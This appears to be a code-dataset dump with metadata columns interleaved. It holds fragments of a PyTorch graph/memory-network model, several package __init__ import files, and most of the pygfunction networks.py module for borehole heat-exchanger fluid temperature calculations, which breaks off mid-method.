output = self.fc_output(last_kg)
pred = self.ans_selector(output)
return pred
class DenseGCNConv(torch.nn.Module):
def __init__(self, in_channels, out_channels, improved=False, bias=True):
super(DenseGCNConv, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.improved = improved
self.weight = nn.Parameter(torch.Tensor(self.in_channels, self.out_channels))
self.register_parameter("gcn_weight", self.weight)
        if bias:
            self.bias = nn.Parameter(torch.Tensor(self.out_channels))
            self.register_parameter("gcn_bias", self.bias)
        else:
            # forward() checks `self.bias is not None`, so define it explicitly
            self.bias = None
self.reset_parameters()
def reset_parameters(self):
utils.glorot(self.weight)
utils.zeros(self.bias)
def forward(self, x, adj, mask=None, add_loop=True):
x = x.float()
adj = adj.float()
x = x.unsqueeze(0) if x.dim() == 2 else x
adj = adj.unsqueeze(0) if adj.dim() == 2 else adj
B, N, _ = adj.size()
if add_loop:
adj = adj.clone()
idx = torch.arange(N, dtype=torch.long, device=adj.device)
adj[:, idx, idx] = 1 if not self.improved else 2
out = torch.matmul(x, self.weight)
deg_inv_sqrt = adj.sum(dim=-1).clamp(min=1).pow(-0.5)
adj = deg_inv_sqrt.unsqueeze(-1) * adj * deg_inv_sqrt.unsqueeze(-2)
out = torch.matmul(adj, out)
if self.bias is not None:
out = out + self.bias
if mask is not None:
out = out * mask.view(B, N, 1).to(x.dtype)
return out
class MemNet(nn.Module):
def __init__(self, cfg, args):
super(MemNet, self).__init__()
self.cfg = cfg
self.args = args
self.n_steps = cfg["MODEL"]["NUM_STEP"]
self.word_emb_size = cfg["MODEL"]["NUM_WORD_EMB"]
self.dropout = nn.Dropout(p=self.cfg["MODEL"]["DROPOUT"])
self.i2e_ab = ClassEmbedding(cfg)
if cfg["MODEL"]["SHARE_FLAG"] == True:
self.i2e_c = self.i2e_ab
else:
self.i2e_c = ClassEmbedding(cfg)
self.ans_selector = AnswerSelector(cfg)
def forward(self, batch):
q = batch[0]
x = batch[1]
bs = x.size(0)
story_len = x.size(1)
s_sent_len = x.size(2)
x = x.view(bs * story_len, -1)
u = self.dropout(self.i2e_ab(q))
u = torch.sum(torch.sum(u, 1), 1)
for k in range(self.n_steps):
m = self.dropout(self.i2e_ab(x))
m = m.view(bs, story_len, s_sent_len, -1)
m = torch.sum(m, 2)
c = self.dropout(self.i2e_c(x))
c = c.view(bs, story_len, s_sent_len, -1)
c = torch.sum(c, 2)
            p = torch.bmm(m, u.unsqueeze(2)).squeeze(2)
p = F.softmax(p, -1).unsqueeze(1)
o = torch.bmm(p, c).squeeze(1)
u = o + u
pred = self.ans_selector(u)
return pred
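# Shape sanity check (sketch, not part of the original file) for the graph
# aggregation module defined above; the dimensions are arbitrary examples.

if __name__ == "__main__":
    gf = GraphFeature(hidden_dim=8, n_node=5, n_edge=2, n_anno=1)
    x = torch.randn(3, 5, 8 + 1)  # (batch, nodes, hidden + annotation)
    print(gf(x).shape)  # expected: torch.Size([3, 8])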
| 34.768041
| 88
| 0.590393
| 5,010
| 33,725
| 3.666467
| 0.05489
| 0.037019
| 0.031738
| 0.03593
| 0.814252
| 0.786597
| 0.766019
| 0.752137
| 0.728946
| 0.698405
| 0
| 0.015749
| 0.282669
| 33,725
| 969
| 89
| 34.803922
| 0.743552
| 0.013758
| 0
| 0.651882
| 0
| 0
| 0.048124
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047043
| false
| 0
| 0.008065
| 0
| 0.100806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
56dac5251f133c64a12089bcda267a15d29def2b
| 468
|
py
|
Python
|
FSMSIM/expr/__init__.py
|
FSMSIM/FSMSIM
|
a3069c07aeca6e814519871f4c93a88da32c9e1d
|
[
"BSD-3-Clause"
] | null | null | null |
FSMSIM/expr/__init__.py
|
FSMSIM/FSMSIM
|
a3069c07aeca6e814519871f4c93a88da32c9e1d
|
[
"BSD-3-Clause"
] | null | null | null |
FSMSIM/expr/__init__.py
|
FSMSIM/FSMSIM
|
a3069c07aeca6e814519871f4c93a88da32c9e1d
|
[
"BSD-3-Clause"
] | null | null | null |
from FSMSIM.expr.and_expr import *
from FSMSIM.expr.arr_access_expr import *
from FSMSIM.expr.arr_expr import *
from FSMSIM.expr.bool_expr import *
from FSMSIM.expr.concat_expr import *
from FSMSIM.expr.eq_expr import *
from FSMSIM.expr.expr import *
from FSMSIM.expr.neq_expr import *
from FSMSIM.expr.or_expr import *
from FSMSIM.expr.output_expr import *
from FSMSIM.expr.slice_expr import *
from FSMSIM.expr.string_expr import *
from FSMSIM.expr.var_expr import *
| 33.428571
| 41
| 0.805556
| 78
| 468
| 4.666667
| 0.205128
| 0.357143
| 0.5
| 0.659341
| 0.807692
| 0.148352
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 468
| 13
| 42
| 36
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
56ed7b70c736304145d364e21ae3a47c385704aa
| 185
|
py
|
Python
|
src/safe_env/envloader/resourcehandlers/__init__.py
|
antonsmislevics/safe-env
|
8727bda0b3a0010f0653dbfe824910ac69e27007
|
[
"MIT"
] | null | null | null |
src/safe_env/envloader/resourcehandlers/__init__.py
|
antonsmislevics/safe-env
|
8727bda0b3a0010f0653dbfe824910ac69e27007
|
[
"MIT"
] | null | null | null |
src/safe_env/envloader/resourcehandlers/__init__.py
|
antonsmislevics/safe-env
|
8727bda0b3a0010f0653dbfe824910ac69e27007
|
[
"MIT"
] | null | null | null |
from .baseresourcehandler import BaseResourceHandler
from .azurerestresourcehandler import AzureRESTResourceHandler
# from .delayedloadresourcehandler import DelayedLoadResourceHandler
| 46.25
| 68
| 0.908108
| 12
| 185
| 14
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07027
| 185
| 3
| 69
| 61.666667
| 0.976744
| 0.356757
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
710132cbfff19df39799b7869cd4c7d79e4d40b1
| 183
|
py
|
Python
|
pymensago/__init__.py
|
darkwyrm/pymensago
|
add93a6a87def3b6909666d23b8d885cfbdee5c4
|
[
"MIT"
] | 1
|
2021-10-01T01:35:19.000Z
|
2021-10-01T01:35:19.000Z
|
pymensago/__init__.py
|
darkwyrm/pymensago
|
add93a6a87def3b6909666d23b8d885cfbdee5c4
|
[
"MIT"
] | null | null | null |
pymensago/__init__.py
|
darkwyrm/pymensago
|
add93a6a87def3b6909666d23b8d885cfbdee5c4
|
[
"MIT"
] | null | null | null |
from . import auth
from . import client
from . import encryption
from . import keycard
from . import serverconn
from . import userprofile
from . import utils
from . import workspace
| 18.3
| 25
| 0.775956
| 24
| 183
| 5.916667
| 0.416667
| 0.56338
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180328
| 183
| 9
| 26
| 20.333333
| 0.946667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
855b2401d94fcb40c1fa7d991626e5fe6f11bc9e
| 377
|
py
|
Python
|
compose/config/__init__.py
|
pareshmg/compose
|
cba758361499d74ef26bf281b73206e6dc12b5c9
|
[
"Apache-2.0"
] | 2
|
2020-07-30T04:04:04.000Z
|
2020-07-31T10:40:58.000Z
|
compose/config/__init__.py
|
pareshmg/compose
|
cba758361499d74ef26bf281b73206e6dc12b5c9
|
[
"Apache-2.0"
] | 38
|
2021-07-19T21:08:06.000Z
|
2022-03-28T21:11:05.000Z
|
compose/config/__init__.py
|
pareshmg/compose
|
cba758361499d74ef26bf281b73206e6dc12b5c9
|
[
"Apache-2.0"
] | 3
|
2020-09-22T02:56:37.000Z
|
2021-03-15T10:31:24.000Z
|
# flake8: noqa
from . import environment
from .config import ConfigurationError
from .config import DOCKER_CONFIG_KEYS
from .config import find
from .config import is_url
from .config import load
from .config import merge_environment
from .config import merge_labels
from .config import parse_environment
from .config import parse_labels
from .config import resolve_build_args
| 29
| 38
| 0.840849
| 54
| 377
| 5.703704
| 0.351852
| 0.324675
| 0.519481
| 0.262987
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00303
| 0.124668
| 377
| 12
| 39
| 31.416667
| 0.930303
| 0.03183
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a46fd343c2794f05050d0035da6da1144ce2de51
| 106
|
py
|
Python
|
erp_reloaded/mixins/models.py
|
martinlehoux/erp-reloaded
|
db7dea603095dec558f4b0ad9a0d2dbd20f8703c
|
[
"MIT"
] | null | null | null |
erp_reloaded/mixins/models.py
|
martinlehoux/erp-reloaded
|
db7dea603095dec558f4b0ad9a0d2dbd20f8703c
|
[
"MIT"
] | 5
|
2021-04-08T18:54:04.000Z
|
2021-06-10T18:37:26.000Z
|
erp_reloaded/mixins/models.py
|
martinlehoux/erp-reloaded
|
db7dea603095dec558f4b0ad9a0d2dbd20f8703c
|
[
"MIT"
] | null | null | null |
class Person:
@property
def full_name(self):
return f"{self.first_name} {self.last_name}"
| 21.2
| 52
| 0.650943
| 15
| 106
| 4.4
| 0.733333
| 0.242424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.226415
| 106
| 4
| 53
| 26.5
| 0.804878
| 0
| 0
| 0
| 0
| 0
| 0.320755
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
f17e59768d3999b726bce02fff67a40ecc6a0d94
| 53,997
|
py
|
Python
|
pygfunction/networks.py
|
j-c-cook/pygfunction
|
73cb9292fc39a068bd3d4ebe66b07ec9c8903c8d
|
[
"BSD-3-Clause"
] | null | null | null |
pygfunction/networks.py
|
j-c-cook/pygfunction
|
73cb9292fc39a068bd3d4ebe66b07ec9c8903c8d
|
[
"BSD-3-Clause"
] | 2
|
2021-04-10T05:17:18.000Z
|
2021-08-10T22:08:54.000Z
|
pygfunction/networks.py
|
j-c-cook/pygfunction
|
73cb9292fc39a068bd3d4ebe66b07ec9c8903c8d
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
from scipy.linalg import block_diag
class Network(object):
"""
Class for networks of boreholes with series, parallel, and mixed
connections between the boreholes.
Contains information regarding the physical dimensions and thermal
characteristics of the pipes and the grout material in each borehole, the
topology of the connections between boreholes, as well as methods to
evaluate fluid temperatures and heat extraction rates based on the work of
Cimmino (2018, 2019) [#Network-Cimmin2018]_, [#Network-Cimmin2019]_.
Attributes
----------
boreholes : list of Borehole objects
List of boreholes included in the bore field.
pipes : list of pipe objects
List of pipes included in the bore field.
bore_connectivity : list, optional
Index of fluid inlet into each borehole. -1 corresponds to a borehole
connected to the bore field inlet. If this parameter is not provided,
parallel connections between boreholes are used.
Default is None.
m_flow_network : float or array, optional
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits. This
parameter is used to initialize the coefficients if it is provided.
Default is None.
cp_f : float, optional
Fluid specific isobaric heat capacity (in J/kg.degC). This parameter is
used to initialize the coefficients if it is provided.
Default is None.
nSegments : int, optional
Number of line segments used per borehole. This parameter is used to
initialize the coefficients if it is provided.
Default is None.
Notes
-----
The expected array shapes of input parameters and outputs are documented
for each class method. `nInlets` and `nOutlets` are the number of inlets
and outlets to the network, and both correspond to the number of parallel
circuits. `nTotalSegments` is the sum of the number of discretized segments
along every borehole. `nBoreholes` is the total number of boreholes in the
network.
References
----------
.. [#Network-Cimmin2018] Cimmino, M. (2018). g-Functions for bore fields with
mixed parallel and series connections considering the axial fluid
temperature variations. Proceedings of the IGSHPA Sweden Research Track
2018. Stockholm, Sweden. pp. 262-270.
.. [#Network-Cimmin2019] Cimmino, M. (2019). Semi-analytical method for
g-function calculation of bore fields with series- and
parallel-connected boreholes. Science and Technology for the Built
Environment, 25 (8), 1007-1022.
"""
def __init__(self, boreholes, pipes, bore_connectivity=None,
m_flow_network=None, cp_f=None, nSegments=None):
self.b = boreholes
self.H_tot = sum([b.H for b in self.b])
self.nBoreholes = len(boreholes)
self.p = pipes
if bore_connectivity is None:
bore_connectivity = [-1]*self.nBoreholes
self.c = bore_connectivity
self.m_flow_network = m_flow_network
self.cp_f = cp_f
# Verify that borehole connectivity is valid
_verify_bore_connectivity(bore_connectivity, self.nBoreholes)
iInlets, nInlets, iOutlets, nOutlets, iCircuit = _find_inlets_outlets(
bore_connectivity, self.nBoreholes)
# Number of inlets and outlets in network
self.nInlets = nInlets
self.nOutlets = nOutlets
# Indices of inlets and outlets in network
self.iInlets = iInlets
self.iOutlets = iOutlets
# Indices of circuit of each borehole in network
self.iCircuit = iCircuit
# Initialize stored_coefficients
self._initialize_coefficients_connectivity()
self._initialize_stored_coefficients(m_flow_network, cp_f, nSegments)
def get_inlet_temperature(
self, T_f_in, T_b, m_flow_network, cp_f, nSegments):
"""
Returns the inlet fluid temperatures of all boreholes.
Parameters
----------
T_f_in : float or (1,) array
Inlet fluid temperatures into network (in Celsius).
T_b : float or (nTotalSegments,) array
Borehole wall temperatures (in Celsius). If a float is supplied,
the same temperature is applied to all segments of all boreholes.
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
T_f_in : (nBoreholes,) array
Inlet fluid temperature (in Celsius) into each borehole.
"""
# Build coefficient matrices
a_in, a_b = self.coefficients_inlet_temperature(
m_flow_network, cp_f, nSegments)
# Evaluate outlet temperatures
if np.isscalar(T_b):
T_b = np.tile(T_b, sum(self.nSegments))
T_f_in_borehole = a_in @ np.atleast_1d(T_f_in) + a_b @ T_b
return T_f_in_borehole
def get_outlet_temperature(self, T_f_in, T_b, m_flow_network, cp_f, nSegments):
"""
Returns the outlet fluid temperatures of all boreholes.
Parameters
----------
T_f_in : float or (1,) array
Inlet fluid temperatures into network (in Celsius).
T_b : float or (nTotalSegments,) array
Borehole wall temperatures (in Celsius). If a float is supplied,
the same temperature is applied to all segments of all boreholes.
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
T_f_out : (nBoreholes,) array
Outlet fluid temperatures (in Celsius) from each borehole.
"""
# Build coefficient matrices
a_in, a_b = self.coefficients_outlet_temperature(
m_flow_network, cp_f, nSegments)
# Evaluate outlet temperatures
if np.isscalar(T_b):
T_b = np.tile(T_b, sum(self.nSegments))
T_f_out = a_in @ np.atleast_1d(T_f_in) + a_b @ T_b
return T_f_out
def get_borehole_heat_extraction_rate(
self, T_f_in, T_b, m_flow_network, cp_f, nSegments):
"""
Returns the heat extraction rates of all boreholes.
Parameters
----------
T_f_in : float or (1,) array
Inlet fluid temperatures into network (in Celsius).
T_b : float or (nTotalSegments,) array
Borehole wall temperatures (in Celsius). If a float is supplied,
the same temperature is applied to all segments of all boreholes.
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
Q_b : (nTotalSegments,) array
Heat extraction rates along each borehole segment (in Watts).
"""
a_in, a_b = self.coefficients_borehole_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
if np.isscalar(T_b):
T_b = np.tile(T_b, sum(self.nSegments))
Q_b = a_in @ np.atleast_1d(T_f_in) + a_b @ T_b
return Q_b
def get_fluid_heat_extraction_rate(
self, T_f_in, T_b, m_flow_network, cp_f, nSegments):
"""
Returns the total heat extraction rates of all boreholes.
Parameters
----------
T_f_in : float or (1,) array
Inlet fluid temperatures into network (in Celsius).
T_b : float or (nTotalSegments,) array
Borehole wall temperatures (in Celsius). If a float is supplied,
the same temperature is applied to all segments of all boreholes.
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
Q_f : (nBoreholes,) array
Total heat extraction rates from each borehole (in Watts).
"""
a_in, a_b = self.coefficients_fluid_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
if np.isscalar(T_b):
T_b = np.tile(T_b, sum(self.nSegments))
Q_f = a_in @ np.atleast_1d(T_f_in) + a_b @ T_b
return Q_f
def get_network_inlet_temperature(
self, Q_t, T_b, m_flow_network, cp_f, nSegments):
"""
Returns the inlet fluid temperature of the network.
Parameters
----------
Q_t : float or (1,) array
Total heat extraction rate from the network (in Watts).
T_b : float or (nTotalSegments,) array
Borehole wall temperatures (in Celsius). If a float is supplied,
the same temperature is applied to all segments of all boreholes.
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
T_f_in : float or (1,) array
Inlet fluid temperature (in Celsius) into the network. The returned
type corresponds to the type of the parameter `Q_t`.
"""
# Build coefficient matrices
a_q, a_b = self.coefficients_network_inlet_temperature(
m_flow_network, cp_f, nSegments)
# Evaluate outlet temperatures
if np.isscalar(T_b):
T_b = np.tile(T_b, sum(self.nSegments))
T_f_in = a_q @ np.atleast_1d(Q_t) + a_b @ T_b
if np.isscalar(Q_t):
T_f_in = T_f_in.item()
return T_f_in
def get_network_outlet_temperature(
self, T_f_in, T_b, m_flow_network, cp_f, nSegments):
"""
Returns the outlet fluid temperature of the network.
Parameters
----------
T_f_in : float or (1,) array
Inlet fluid temperatures into network (in Celsius).
T_b : float or (nTotalSegments,) array
Borehole wall temperatures (in Celsius). If a float is supplied,
the same temperature is applied to all segments of all boreholes.
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
T_f_out : float or (1,) array
Outlet fluid temperature (in Celsius) from the network. The
returned type corresponds to the type of the parameter `T_f_in`.
"""
# Build coefficient matrices
a_in, a_b = self.coefficients_network_outlet_temperature(
m_flow_network, cp_f, nSegments)
# Evaluate outlet temperatures
if np.isscalar(T_b):
T_b = np.tile(T_b, sum(self.nSegments))
T_f_out = a_in @ np.atleast_1d(T_f_in) + a_b @ T_b
if np.isscalar(T_f_in):
T_f_out = T_f_out.item()
return T_f_out
def get_network_heat_extraction_rate(
self, T_f_in, T_b, m_flow_network, cp_f, nSegments):
"""
Returns the total heat extraction rate of the network.
Parameters
----------
T_f_in : float or (1,) array
Inlet fluid temperatures into network (in Celsius).
T_b : float or (nTotalSegments,) array
Borehole wall temperatures (in Celsius). If a float is supplied,
the same temperature is applied to all segments of all boreholes.
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
Q_t : float or (1,) array
Heat extraction rate of the network (in Watts). The returned type
corresponds to the type of the parameter `T_f_in`.
"""
a_in, a_b = self.coefficients_network_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
if np.isscalar(T_b):
T_b = np.tile(T_b, sum(self.nSegments))
Q_t = a_in @ np.atleast_1d(T_f_in) + a_b @ T_b
if np.isscalar(T_f_in):
Q_t = Q_t.item()
return Q_t
def coefficients_inlet_temperature(self, m_flow_network, cp_f, nSegments):
"""
Build coefficient matrices to evaluate inlet fluid temperatures of all
boreholes.
Returns coefficients for the relation:
.. math::
\\mathbf{T_{f,borehole,in}} =
\\mathbf{a_{in}} T_{f,network,in}
+ \\mathbf{a_{b}} \\mathbf{T_b}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
a_in : (nBoreholes, 1,) array
Array of coefficients for inlet fluid temperature.
a_b : (nBoreholes, nTotalSegments,) array
Array of coefficients for borehole wall temperatures.
"""
# method_id for coefficients_inlet_temperature is 0
method_id = 0
# Check if stored coefficients are available
if self._check_coefficients(
m_flow_network, cp_f, nSegments, method_id):
a_in, a_b = self._get_stored_coefficients(method_id)
else:
# Update input variables
self._format_inputs(m_flow_network, cp_f, nSegments)
# Coefficient matrices for borehole inlet temperatures:
# [T_{f,b,in}] = [c_in]*[T_{f,n,in}] + [c_out]*[T_{f,b,out}]
c_in = self._c_in
c_out = self._c_out
# Coefficient matrices for borehole outlet temperatures:
# [T_{f,b,out}] = [A]*[T_{f,b,in}] + [B]*[T_{b}]
AB = list(zip(*[
self.p[i].coefficients_outlet_temperature(
self._m_flow_borehole[i],
self._cp_borehole[i],
self.nSegments[i])
for i in range(self.nBoreholes)]))
A = block_diag(*AB[0])
B = block_diag(*AB[1])
# Coefficient matrices for borehole inlet temperatures:
# [T_{f,b,in}] = [a_in]*[T_{f,n,in}] + [a_b]*[T_{b}]
ICA = np.eye(self.nBoreholes) - c_out @ A
a_in = np.linalg.solve(ICA, c_in)
a_b = np.linalg.solve(ICA, c_out @ B)
# Store coefficients
self._set_stored_coefficients(
m_flow_network, cp_f, nSegments, (a_in, a_b), method_id)
return a_in, a_b
def coefficients_outlet_temperature(self, m_flow_network, cp_f, nSegments):
"""
Build coefficient matrices to evaluate outlet fluid temperatures of all
boreholes.
Returns coefficients for the relation:
.. math::
\\mathbf{T_{f,borehole,out}} =
\\mathbf{a_{in}} T_{f,network,in}
+ \\mathbf{a_{b}} \\mathbf{T_b}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
a_in : (nBoreholes, 1,) array
Array of coefficients for inlet fluid temperature.
a_b : (nBoreholes, nTotalSegments,) array
Array of coefficients for borehole wall temperatures.
"""
# method_id for coefficients_outlet_temperature is 1
method_id = 1
# Check if stored coefficients are available
if self._check_coefficients(
m_flow_network, cp_f, nSegments, method_id):
a_in, a_b = self._get_stored_coefficients(method_id)
else:
# Update input variables
self._format_inputs(m_flow_network, cp_f, nSegments)
# Coefficient matrices for borehole inlet temperatures:
# [T_{f,b,in}] = [c_in]*[T_{f,n,in}] + [c_out]*[T_{f,b,out}]
c_in = self._c_in
c_out = self._c_out
# Coefficient matrices for borehole outlet temperatures:
# [T_{f,b,out}] = [A]*[T_{f,b,in}] + [B]*[T_{b}]
AB = list(zip(*[
self.p[i].coefficients_outlet_temperature(
self._m_flow_borehole[i],
self._cp_borehole[i],
self.nSegments[i])
for i in range(self.nBoreholes)]))
A = block_diag(*AB[0])
B = block_diag(*AB[1])
# Coefficient matrices for borehole outlet temperatures:
# [T_{f,b,out}] = [a_in]*[T_{f,n,in}] + [a_b]*[T_{b}]
IAC = np.eye(self.nBoreholes) - A @ c_out
a_in = np.linalg.solve(IAC, A @ c_in)
a_b = np.linalg.solve(IAC, B)
# Store coefficients
self._set_stored_coefficients(
m_flow_network, cp_f, nSegments, (a_in, a_b), method_id)
return a_in, a_b
def coefficients_network_inlet_temperature(
self, m_flow_network, cp_f, nSegments):
"""
Build coefficient matrices to evaluate inlet fluid temperature of the
network.
Returns coefficients for the relation:
.. math::
\\mathbf{T_{f,network,in}} =
\\mathbf{a_{q,f}} Q_{network}
+ \\mathbf{a_{b}} \\mathbf{T_b}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
a_qf : (1, 1,) array
Array of coefficients for total heat extraction rate.
a_b : (1, nTotalSegments,) array
Array of coefficients for borehole wall temperatures.
"""
# method_id for coefficients_network_inlet_temperature is 2
method_id = 2
# Check if stored coefficients are available
if self._check_coefficients(m_flow_network, cp_f, nSegments, method_id):
a_qf, a_b = self._get_stored_coefficients(method_id)
else:
# Coefficient matrices for network heat extraction rates:
# [Q_{tot}] = [b_in]*[T_{f,n,in}] + [b_b]*[T_{b}]
b_in, b_b = self.coefficients_network_heat_extraction_rate(
m_flow_network, cp_f, nSegments)
# Coefficient matrices for network inlet temperature:
# [T_{f,n,in}] = [a_qf]*[Q_{tot}] + [a_b]*[T_{b}]
b_in_inv = np.linalg.inv(b_in)
a_qf = b_in_inv
a_b = -b_in_inv.dot(b_b)
# Store coefficients
self._set_stored_coefficients(
m_flow_network, cp_f, nSegments, (a_qf, a_b), method_id)
return a_qf, a_b
def coefficients_network_outlet_temperature(
self, m_flow_network, cp_f, nSegments):
"""
Build coefficient matrices to evaluate outlet fluid temperature of the
network.
Returns coefficients for the relation:
.. math::
\\mathbf{T_{f,network,out}} =
\\mathbf{a_{in}} T_{f,network,in}
+ \\mathbf{a_{b}} \\mathbf{T_b}
Parameters
----------
m_flow_network : float or (nInlets,) array
Total mass flow rate into the network or inlet mass flow rates
into each circuit of the network (in kg/s). If a float is supplied,
the total mass flow rate is split equally into all circuits.
cp_f : float
Fluid specific isobaric heat capacity (in J/kg.degC).
nSegments : int or list
Number of borehole segments for each borehole. If an int is
supplied, all boreholes are considered to have the same number of
segments.
Returns
-------
a_in : (1, 1,) array
Array of coefficients for inlet fluid temperature.
a_b : (1, nTotalSegments,) array
Array of coefficients for borehole wall temperatures.
"""
# method_id for coefficients_network_outlet_temperature is 3
method_id = 3
# Check if stored coefficients are available
if self._check_coefficients(
m_flow_network, cp_f, nSegments, method_id):
a_in, a_b = self._get_stored_coefficients(method_id)
else:
# Coefficient matrices for borehole outlet temperatures:
# [T_{f,b,out}] = [b_in]*[T_{f,n,in}] + [b_b]*[T_{b}]
b_in, b_b = self.coefficients_outlet_temperature(
m_flow_network, cp_f, nSegments)
# Coefficient matrices for network outlet temperature:
# [T_{f,n,out}] = [a_in]*[T_{f,n,in}] + [a_b]*[T_{b}]
mix_out = self._coefficients_mixing(m_flow_network)
